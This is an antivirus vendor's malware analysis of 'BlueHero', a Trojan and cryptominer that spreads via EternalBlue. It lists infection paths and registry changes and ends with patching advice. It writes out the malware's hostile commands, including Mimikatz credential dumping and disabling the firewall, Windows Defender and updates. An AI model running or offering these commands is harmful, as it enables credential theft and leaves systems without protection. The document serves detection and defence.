General Explanation
Type: Trojan
Degree of destruction: high
Prevalence: average
using vulnerability: EternalBlue
What is a Trojan?
Trojans are a type of malware that reveal themselves as legal and healthy software and act exactly like useful and functional software, but when you run them, they will cause so much damage to your system. Downloaded software from the web, embedding in the HTML text, attaching to email, etc are types of ways that Trojans use to enter the system. Trojans against viruses and worms are not reproducible.
What is BlueHero malware?
This malware uses a vulnerability named EternalBlue to release itself. The ultimate goal of this malware is to extract cryptocurrency and spying the user’s system. Malware attempt to extract cryptocurrency by using the victim’s system CPU.
Technical Explanation
Signs of infection
- The main file of the malware exists in the following paths with random names:
%Windir%\ [Random]
%Windir%\Fonts
- The mine file of the malware is in the following path with the name of [Random].exe
%Windir%\Temp\ [Random]
- A type of Sisco malware is in the following path with a random name:
%Windir%\syswow64
%Windir%\system32
- File maintenance in the following registry path in the Windir%\Fonts % path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- A ScheduledTask for existence file in Windir%\Fonts % path with the random name
- Creating two services with random names one is for Sisco’s malware and the other is for the existing file in the Windir%\%[Random].
- In the case of infection, all mentioned files are running and it is notable that the miner process of the malware, is a sub-set of the Spoolsv.exe (a systematic process) executed.
Function explanation
Malware by running the main file initiates to the creation and execute the mentioned files. Then, it will execute commands on the victim’s system. These commands are as follows:
- Deletion of all system communication policies with the following instruction:
- netsh IPSec static delete all
- Adding its desired communication policies (IPsec) by using the following instruction:
- netsh IPSec static add policy name=[Malware’s ipsec] description=[ Malware’s ipsec]
- Creating a ScheduledTask for one of its versions in the Fonts folder, by using the following instructions:
- cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn “astbpvetc” /ru system /tr “cmd /c %Windir%\Fonts\abapbsi.exe”
- This malware also uses Mimikatz to attain the user’s system information. This program is built with the name of exe in the Windir%\[Random]\Corporate % path which executed the following instruction and its output will be added to the log.txt file.
- cmd /c %Windir%\[Random]\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> %Windir%\[Random]\Corporate\log.txt
- Deactivating Firewall for Private, Domain, and Public users:
- cmd /c netsh firewall set opmode mode=disable
- cmd /c netsh Advfirewall set allprofiles state off
- Deactivating Internet Connection Sharing (ICS) service and disabling its restart:
- cmd /c net stop SharedAccess
- cmd /c sc config SharedAccess start= disabled
- Deactivating Firewall service and disabling its restart:
- cmd /c net stop MpsSvc
- cmd /c sc config MpsSvc start= disabled
- Deactivating WindowsDefender service and disabling its restart:
- cmd /c net stop WinDefend
- cmd /c sc config WinDefend start= disabled
- Deactivating the Windows update service and disabling its restart:
- cmd /c net stop wuauserv
- cmd /c sc config wuauserv start= disabled
- Receiving Dump from all system processes and storing them all in the format of [ProcessId].dml by using the following instruction:
- %Windir%\TEMP\[Random] \stellulag.exe -accepteula -mp 1536 %Windir%\TEMP\[Random] \1536.dmp
- Denial of all users to access hosts files, by the following instruction:
- cmd /c echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D users & echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D SYSTEM
The main file of the malware is also causing the following changes in the system:
- Changing the value of some default files for some extensions to txtfile in registry path HKEY_CLASSES_ROOT cause to consider these types of files as text files and will interfere with their function. These types included the following types:
- .bat
- .cmd
- .js
- .vbs
- .VBE
- .reg
- .ps1
- Creating a filter among system communication policies. This filter can be seen in the following registry path:
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local
- Defining the value of a Debugger in the registry for a series of systemic software results in the user cannot use them. This value defines in the following registry path:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
The systemic software which will plague the above actions are as follows:
- at.exe
- bitsadmin.exe
- cacls.exe
- certutil.exe
- cscript.exe
- icacls.exe
- magnify.exe
- mshta.exe
- netsh.exe
- perfmon.exe
- powershell.exe
- reg.exe
- regini.exe
- Regsvr32.exe
- rundll32.exe
- schtasks.exe
- sethc.exe
- takeown.exe
- taskkill.exe
- WinSAT.exe
- WmiPrvSE.exe
- wscript.exe
How to deal with it and disinfect it
Padvish Antivirus will detect this malware and remove it from the system. To prevent possible infections by malware that uses EternalBlue vulnerability, it is recommended to use the security patch of Microsoft ms17-010. The IPS section of Padvish antivirus will detect these kinds of vulnerabilities and prevent them from entering the system.